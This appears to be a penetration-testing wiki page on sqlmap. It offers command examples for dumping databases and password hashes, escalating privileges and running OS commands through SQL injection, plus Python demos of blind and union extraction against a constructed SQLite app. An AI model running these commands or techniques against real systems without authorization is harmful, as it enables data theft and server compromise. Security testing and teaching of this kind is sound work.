> For the complete documentation index, see [llms.txt](https://book.redsquad.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.redsquad.xyz/web-hacking/injections/sqli/sqlmap.md).

# SQLmap

{% hint style="info" %}
**sqlmap**'s goal is to detect and exploit **SQL injection vulnerabilities** in web applications. Once it has detected one or more SQL injections on the target host, the user can choose among a variety of options: perform an extensive back-end database management system **fingerprint**, **retrieve** the DBMS **session** user and current database, **enumerate** users, password hashes, privileges and databases, dump entire tables or specific columns, run arbitrary SQL statements, read specific files from the file system, and more.
{% endhint %}

{% embed url="https://thedarksource.com/sqlmap-cheat-sheet" %}
SQLMap cheatsheet
{% endembed %}

### Dumping tables

{% embed url="https://rnehra01.github.io/Dumping-tables-using-sqlmap" %}

### Examples

* Target the *<http://target.server.com>* URL using the **-u** flag:

```bash
sqlmap -u 'http://target.server.com'
```

* Send POST requests by passing the body with the **--data** flag (sqlmap switches to POST automatically when `--data` is given; **--method** sets the verb explicitly):

```bash
sqlmap -u "http://10.10.155.76/login.php" --method POST --data "log_email=cun@gmail.com&log_password=123456&login_button=Login" --dbs
```

* Target a vulnerable parameter in an authenticated session by supplying the session cookie with the **--cookie** flag:

```bash
sqlmap -u 'http://target.server.com' --cookie='JSESSIONID=09h76qoWC559GH1K7D-SQHx'
```

* Ignore any `Set-Cookie` header returned by the target web server (so the session you supplied is not replaced mid-scan) using the **--drop-set-cookie** flag:

```bash
sqlmap -u 'http://target.server.com' -r req.txt --drop-set-cookie
```

* Perform more thorough, and riskier, tests using the **--level** (1-5) and **--risk** (1-3) flags:

```bash
sqlmap -u 'http://target.server.com' --data='param1=blah' --level=5 --risk=3
```

* Specify which POST or GET parameter to target using the **-p** flag:

```bash
sqlmap -u 'http://target.server.com' --data='param1=blah&param2=blah' -p param1
```

* Use a random `User-Agent` request header with the **--random-agent** flag:

```bash
sqlmap -u 'http://target.server.com' -r req.txt --random-agent
```

* Restrict the tests to a specific database service with the **--dbms** flag:

```bash
sqlmap -u 'http://target.server.com' -r req.txt --dbms Oracle
```

* Read a request stored via Burp Suite, target only the `user` parameter, run risky queries, and dump user names and password hashes:

```bash
sqlmap -r ./req.txt -p user --level=1 --risk=3 --passwords
```

* Attempt to escalate the privileges of the database process user:

```bash
sqlmap -r ./req.txt --level=1 --risk=3 --priv-esc
```

* Run the `whoami` command on the target server:

```bash
sqlmap -r ./req.txt --level=1 --risk=3 --os-cmd=whoami
```

* Dump everything in the current database, but wait one second between requests:

```bash
sqlmap -r ./req.txt --level=1 --risk=3 --dump --delay=1
```
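To make the `-r`, `--data`, `--cookie`, `-p`, `--level` and `--risk` options above concrete, here is an added Python example (written for this page, not sqlmap's own code) that parses a Burp-style saved request, lists which injection points sqlmap tests by default at each `--level`, and builds the explicit `-u/--data/--cookie` command line that `-r req.txt` stands in for. The request is constructed, and the level rules (GET/POST parameters at level 1, Cookie values from level 2, User-Agent/Referer from level 3, Host only at level 5) follow sqlmap's documented behaviour; the `--force-ssl` scheme is an assumption passed as a parameter.

```python
import shlex
from urllib.parse import parse_qsl, urlsplit

# Constructed sample request in the format Burp Suite saves (what you would pass with -r).
SAMPLE_REQUEST = (
    "POST /login.php?next=%2Fhome HTTP/1.1\r\n"
    "Host: target.server.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Referer: http://target.server.com/index.php\r\n"
    "Cookie: JSESSIONID=09h76qoWC559GH1K7D-SQHx; theme=dark\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "log_email=cun%40gmail.com&log_password=123456&login_button=Login"
)


def parse_request(raw, scheme="http"):
    """Split a raw HTTP/1.1 request into method, URL, headers, cookies and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.splitlines()
    method, target, _version = request_line.split()
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cookies = {}
    for item in headers.get("cookie", "").split(";"):
        if "=" in item:
            name, value = item.strip().split("=", 1)
            cookies[name] = value
    # The raw file does not record the scheme; --force-ssl is the equivalent of scheme="https".
    return {
        "method": method,
        "url": "%s://%s%s" % (scheme, headers["host"], target),
        "headers": headers,
        "cookies": cookies,
        "body": body.strip(),
    }


def injection_points(req, level=1):
    """(place, name) pairs sqlmap tests by default at this --level (1-5).

    GET/POST parameters are tested at every level, Cookie values from level 2,
    User-Agent and Referer from level 3, Host only at level 5. Levels 4 and 5
    otherwise add payloads and boundaries, not new places.
    """
    if not 1 <= level <= 5:
        raise ValueError("--level must be between 1 and 5")
    query = urlsplit(req["url"]).query
    points = [("GET", name) for name, _ in parse_qsl(query, keep_blank_values=True)]
    if req["body"]:
        points += [("POST", name) for name, _ in parse_qsl(req["body"], keep_blank_values=True)]
    if level >= 2:
        points += [("Cookie", name) for name in req["cookies"]]
    if level >= 3:
        points += [(h.title(), h.title()) for h in ("user-agent", "referer") if h in req["headers"]]
    if level >= 5 and "host" in req["headers"]:
        points.append(("Host", "Host"))
    return points


def sqlmap_command(req, level=1, risk=1, param=None):
    """The explicit -u/--data/--cookie command line equivalent to `-r req.txt`."""
    argv = ["sqlmap", "-u", req["url"], "--method", req["method"]]
    if req["body"]:
        argv += ["--data", req["body"]]
    if req["cookies"]:
        argv += ["--cookie", "; ".join("%s=%s" % kv for kv in req["cookies"].items())]
    if param:
        # -p names the parameter to test; sqlmap tests it even if the level would skip its place.
        argv += ["-p", param]
    argv += ["--level=%d" % level, "--risk=%d" % risk]
    return " ".join(shlex.quote(arg) for arg in argv)


if __name__ == "__main__":
    req = parse_request(SAMPLE_REQUEST)
    for lvl in (1, 2, 3, 5):
        print("level %d:" % lvl, [name for _, name in injection_points(req, lvl)])
    print(sqlmap_command(req, level=2, risk=3, param="log_email"))
```

Run it to see the default attack surface grow from four parameters at level 1 to nine at level 5; the printed command is what you would type if you did not have the saved request at hand.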

### Post-Exploit

* Error-based SQLi only, dump all tables of one database from an MSSQL back end, enumerating as a specific DBMS user, with the `space2comment` tamper (replaces spaces with `/**/`) to get past naive space filtering:

```bash
sqlmap -r req --technique=E -U <user> --level 5 --risk 3 --tamper=space2comment --dbms=MSSQL -D <db> --dump
```

### Flags

*Here are some useful options for your pillaging pleasure:*

`-r req.txt` Specify a request stored in a text file, great for saved requests from BurpSuite.

`--force-ssl` Force SQLmap to use SSL or TLS for its requests.

`--level=1` Depth of the tests, 1 to 5 (default 1). Level 1 tests GET and POST parameters only; level 2 adds Cookie values, level 3 adds the User-Agent and Referer headers, and levels 4 and 5 add more payloads and boundaries. To test only one parameter, use `-p`, not the level.

`--risk=3` Risk of the tests, 1 to 3 (default 1). Risk 2 adds heavy time-based queries; risk 3 adds OR-based boolean tests, which can modify or delete data if the injection point sits in an UPDATE or DELETE statement.

`--delay` Set a delay in-between requests, great for throttled connections.

`--proxy` Set to <http://127.0.0.1:8080> to pipe requests through BurpSuite for inspection.

`--priv-esc` Attempt to escalate the privileges of the database process user.

`--all` Enumerate everything inside the target database.

`--hostname` Print the target database’s hostname.

`--passwords` Find and exfiltrate all users and their password hashes or digests.

`--dbs` Enumerate all databases accessible via the target webserver.

`--comments` Enumerate all found comments inside the database.

`--sql-shell` Return a SQL prompt for interaction.

`--os-cmd` Attempt to execute a system command.

`--os-shell` Attempt to return a command prompt or terminal for interaction.

`--reg-read` Read the specified Windows registry key value.

`--file-write` Specify a local file to be written to the target server.

`--file-dest` Specify the remote destination to write a file to.

`--technique=` Specify a letter or letters of BEUSTQ to control the exploit attempts:

* `B` : Boolean-based blind
* `E` : Error-based
* `U` : Union query-based
* `S` : Stacked queries
* `T` : Time-based blind
* `Q` : Inline queries
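
Two of those techniques shown end to end, as an added Python example that is not part of this page or of sqlmap: `B` (boolean-based blind) and `U` (union query-based) run against a constructed vulnerable query on an in-memory SQLite database. The application, its rows and the secret value are all made up for the demonstration; the payload shapes (`1 AND (...) > n` with a binary search, `0 UNION SELECT ...`) are the general form sqlmap's tests take, not its literal payloads. The point is the cost: blind extraction needs eight requests per character, while a working union injection reflects the value in one.

```python
import sqlite3


class VulnerableApp:
    """Constructed stand-in for a page that drops ?id= straight into SQL."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
        # Constructed rows; the "hash" is just a sample string, not a real credential.
        self.db.executemany(
            "INSERT INTO users VALUES (?, ?, ?)",
            [(1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"), (2, "guest", "d41d8cd9")],
        )
        self.requests = 0

    def page(self, id_value):
        """Return the names shown on the page; a SQL error gives an empty page."""
        self.requests += 1
        sql = "SELECT name FROM users WHERE id = %s" % id_value  # the injection point
        try:
            return [row[0] for row in self.db.execute(sql)]
        except sqlite3.Error:
            return []


def blind_extract(app, subquery):
    """Technique B: recover the result of `subquery` using only whether the page
    showed a row or not. Each value is found by binary search over 0..255,
    which costs exactly eight requests."""

    def ask(condition):
        return bool(app.page("1 AND (%s)" % condition))

    def find(expr):
        lo, hi = 0, 255
        while lo < hi:
            mid = (lo + hi) // 2
            if ask("(%s) > %d" % (expr, mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = find("length((%s))" % subquery)
    return "".join(
        chr(find("unicode(substr((%s), %d, 1))" % (subquery, pos)))
        for pos in range(1, length + 1)
    )


def union_extract(app, subquery):
    """Technique U: the value is reflected in the page in a single request,
    provided the column count matches (one column here) and output is shown."""
    rows = app.page("0 UNION %s" % subquery)
    return rows[0] if rows else None


def demo():
    """Extract the admin password hash both ways and count the requests each needs."""
    target = "SELECT password FROM users WHERE name = 'admin'"
    app = VulnerableApp()
    blind = blind_extract(app, target)
    blind_requests = app.requests
    app.requests = 0
    union = union_extract(app, target)
    return {
        "blind": blind,
        "blind_requests": blind_requests,
        "union": union,
        "union_requests": app.requests,
    }


if __name__ == "__main__":
    print(demo())
```

This is why `--technique=E` or `U` is the first choice when the page reflects query output, and why a blind-only target combined with `--delay` turns a dump into hours: a 32-character value costs 264 boolean requests here (8 for the length, 8 per character) against one union request.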

